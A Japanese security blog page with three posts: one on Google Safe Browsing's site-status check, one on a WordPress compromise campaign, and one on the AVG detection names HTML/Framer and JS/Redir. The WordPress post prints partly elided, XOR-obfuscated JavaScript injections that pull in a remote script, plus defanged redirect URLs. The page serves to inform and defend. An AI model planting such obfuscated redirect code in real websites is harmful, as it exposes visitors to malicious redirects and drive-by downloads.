無題なログ

セキュリティ情報、迷惑メール、フィッシング詐欺、Windows の小ネタを書いているブログです (*^ー^)ノ

カテゴリ: サイト改ざん

| ✏️ Firefly

URL指定でサイト改ざん診断スキャン Googleセーフブラウジングのサイトステータス
 
Google透明性レポート の中に、URLアドレスを指定するとGoogleセーフブラウジングの診断結果が提示される「セーフ ブラウジングのサイト ステータス」なるページができてます。
 
Google のセーフ ブラウジング テクノロジーは、1 日に数十億件の URL を調査して、安全ではないウェブサイトを探します。1日に安全ではないウェブサイトが新たに数千件も見つかります。そのうちの多くは、正当なウェブサイトが不正使用されたものです。
安全ではないサイトが検出されると、Google検索やウェブブラウザで警告が表示されます。アクセスするウェブサイトが危険かどうかは、検索して確認することができます。
さっそく、この 無題な濃いログ をチェックしてみたら診断結果『危険ではない』となってました。
 
イメージ 2
 
現在のステータス:
危険ではない
最近、セーフ ブラウジングで blogs.yahoo.co.jp/fireflyframer 上に不正なコンテンツは検出されませんでした。
 
いちおうリアルタイムの状況を返してるワケではないです。

”怪しいサイト” の診断結果例

ハッキング被害を受けていて、ドライブバイ・ダウンロード攻撃 によるウイルス配信を行ってる 正規の一般サイト をチェックしてみたら診断結果はこんな感じ。
 
イメージ 3
Yahoo!ジオシティーズ内にある個人運営のホームページ
 
イメージ 4
W杯で話題のラグビーに関連する一般サイト
 
イメージ 5
とある宗教団体の公式ホームページ
 
危険
現時点で [URLアドレス] へのアクセスは安全ではありません。
 
おそらく危険
[URLアドレス] の一部のページヘのアクセスは安全ではない可能性があります。
 
いずれもエッチな映像を配信するアダルトサイトとかではありません。
 
一般サイトやブログがハッキングされたり、侵害された広告配信サーバーが読み込まれたり、ウイルスがバラ撒かれることは世界中で日常的に起こってる一方で
 
怪しいサイトにアクセスしない
 
といった現実の脅威とズレてるウイルス対策は実は通用しません。
 
Windowsパソコンの重要な無料ウイルス対策 がちゃんと実施できてるか MyJVNの無料セキュリティ診断ツール で確認しましょう♪
関連するブログ記事
タグ :
#ネットサービス
このエントリーをはてなブックマークに追加

| ✏️ Firefly

WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
 
ブログ作成ツール WordPress を使用してるサイトの改ざん被害のお話が報告されてます。
 
Wordpress header.php var a="'1Aqapkrv'02v{rg injection
https://www.malwareremovalservice.com/wordpress-header-php-var-a1aqapkrv02vrg-injection/
 
The I.T. side of my life: A new WordPress infection: var a="'1Aqapkrv'02v...
http://myitside.blogspot.com/2015/09/a-new-wordpress-infection-var.html
 
Zscaler Research: Compromised WordPress Campaign - Spyware Edition
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spyware.html
 
何かしら WordPress がらみの脆弱性を悪用し、悪意のある第三者が 不正なJavaScriptコード<BODY>タグの直後に挿入するよう仕込んでるみたい。
<body>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2; 【~中略~】 )'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<追記始め>
 
同じ攻撃者による、別の不正なJavaScriptコードの紹介です。 
<body>
<script type="text/javascript">var a = "'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0: 【~中略~】 @'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<head>タグ終端の直前に挿入されるタイプです。
    <!-- ###: -->
    <script>var a = "'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{ 【~中略~】 {rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
    <!-- :### -->
</head>
<追記終わり>
 
JavaScriptコードが処理されると、欧州ラトビアのサーバーにある不審なURLアドレスを裏で読み込みにいきます。
 
https://www.virustotal.com/ja/ip-address/91.226.33.54/information/
 
改ざんされてるブログを閲覧しても変化はない一方で、Google検索経由でブログにアクセスすると広告ページ(2015 年年次訪問者調査)ヘ強制的に飛ばされました。
 
イメージ 5
 
Google検索
 ↓
(改ざんされてるブログ)
 ↓
http //kfc.i.illuminationes[.]com/snitch?default_keyword= ~
http //c11n4.i.teaserguide[.]com/snitch?default_keyword= ~
 ↓
http //c11n4.i.teaserguide[.]com/in/?_BC= ~
 ↓
怪しげな広告ページへ
 
この改ざん被害は、日本語表記の一般サイトでも目にする機会があって、けっこう複数殺られてる感じ?
 
イメージ 1
 
イメージ 2
 
複数の不正なJavaScriptコードが挿入されてるパターンも。
 
イメージ 3
 
イメージ 4
 
改ざんされてるブログをたまたま踏んだ場合にセキュリティソフトが警告するウイルス検出名はこんな感じ。
 
AVG HTML/Framer
BitDefender Trojan.Script.CPY
Kaspersky Trojan-Downloader.JS.Iframe.diq
McAfee JS/Agent.a
Microsoft Trojan:JS/Iframeinject.AE
Sophos Troj/Iframe-NM
関連するブログ記事
リダイレクト改ざんvar a setTimeout(10) default_keyword encodeURIComponent JavaScriptコード ( WEBサイト・CGI )
タグ :
#Twitter
このエントリーをはてなブックマークに追加

| ✏️ Firefly

HTML/Framer JS/Redirとは? セキュリティソフトAVGウイルス検出名の紹介
 
このウイルス検出名は、不正なJavaScriptコード<iframe>タグを含んでるファイルです。 <オランダ(チェコ)のセキュリティソフト AVG 使ってる?
 
HTML/Framer(エイチティーエムエル・フレーマー)
JS/Redir (ジェイエス・リダイレ?)
 
イメージ 1
 
イメージ 3
 
通常はブラウザのキャッシュデータ(一時ファイル)に存在する
  • HTMLファイル、PHPファイル (拡張子 *.html *.htm *.php など)
  • JavaScriptファイル (拡張子 *.js)
を脅威としてウイルス判定するはずで、つまりはブラウザでネットサーフィンしてる時に自然と取り込まることになります。
 
この HTML/Framer ウイルスや JS/Redir ウイルスは、ハッキング被害を受けてる一般サイトやブログを訪問した時や、侵害された広告配信サーバーが読み込まれた時に検出されることもあるのです。
 
Yahoo!知恵袋でも↓お話が投稿されてました。
 
■ 自作したホームページがhtml/Framerというウィルスに感染してしまいました。  
このHPにアクセスした時、PC内のセキュリティソフトが反応しまして、気が付きました。FTPでログインして確認しますと、最近更新していな物も含めて全てのHTMLファイルが更新されていました。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1236606872
 
「怪しいサイト」に限らず、悪意のある第三者によってサイトがハッキングされるのは世界中で日常的に起こってます。

HTML/Framer JS/Redir の機能は?

HTML/Framer ウイルス や JS/Redir ウイルスの挙動は下のような機能です。
不正なページヘ転送(リダイレクト)する事例
 
転送された先で、何かファイルをダウンロードして起動したり、入力ボックスに個人情報/パスワード/クレジットカード情報なんかを不用意に打ち込まないかぎり大丈夫です。
 
ナンと東京都某市の市長さんの事務所の公式サイト(WordPressを利用したブログ)がハッキングされてました。 <HTML/Framer ウイルス検出!
 
 イメージ 2
HTMLソースコードに不正な処理を発見! 複数のJavaScriptタグが挿入されてる
 
プロバイダPlalaから提供さてるホームページサービスを利用した個人運営サイトがハッキングされてました。 <JS/Redir ウイルス検出!
 
イメージ 4
HTMLソースコードに不正な処理を発見! tag5479347351タグ?
 
ドライブバイ・ダウンロード攻撃の事例
 
無料ウイルス対策を実施してない場合に限って何かウイルスが強制インストールされ感染してしまう脅威で、攻撃対象は基本的にWindowsパソコンだけです。 
 
この場合は、セキュリティソフト(もちAVG Anti-Virusなどなど)を仮に導入してあっても無料ウイルス対策ウイルス感染経路をふさいでおくことが必須なので、バージョン確認&セキュリティ診断ツールで確認をぜひ!
 
別に大手ではないけど、JPドメインな食品会社の企業サイトがハッキングされてました。 <HTML/Framer ウイルス検出!
 
イメージ 6
サイト閲覧時に読み込まれる外部JavaScriptファイルに不正な処理が!
 
バスの写真とともに搭乗日記みたいのを掲載してる個人運営サイト(ジオシティーズ)がハッキングされてました。 <HTML/Framer ウイルス検出!
 
イメージ 5
HTMLソースコードに不正な処理を発見! <iframe>タグが挿入されてる
 
物件情報を紹介するCO.JPな企業サイトがハッキングされてました。 <HTML/Framer ウイルス検出!
 
イメージ 7
HTMLソースコードに不正な<iframe>タグ発見! counter.php改ざん

HTML/Framer JS/Redir の対処方法は?

セキュリティソフトで駆除すればOKで、隔離フォルダに移動してるはず。
 
 
ウイルスの駆除削除ができないなら、使用してるブラウザのキャッシュデータ(一時ファイル)を削除しましょう。(「ブラウザ 一時ファイル 削除」とかでググればやり方たくさんヒットします)
タグ :
#その他インターネット
このエントリーをはてなブックマークに追加

↑このページのトップヘ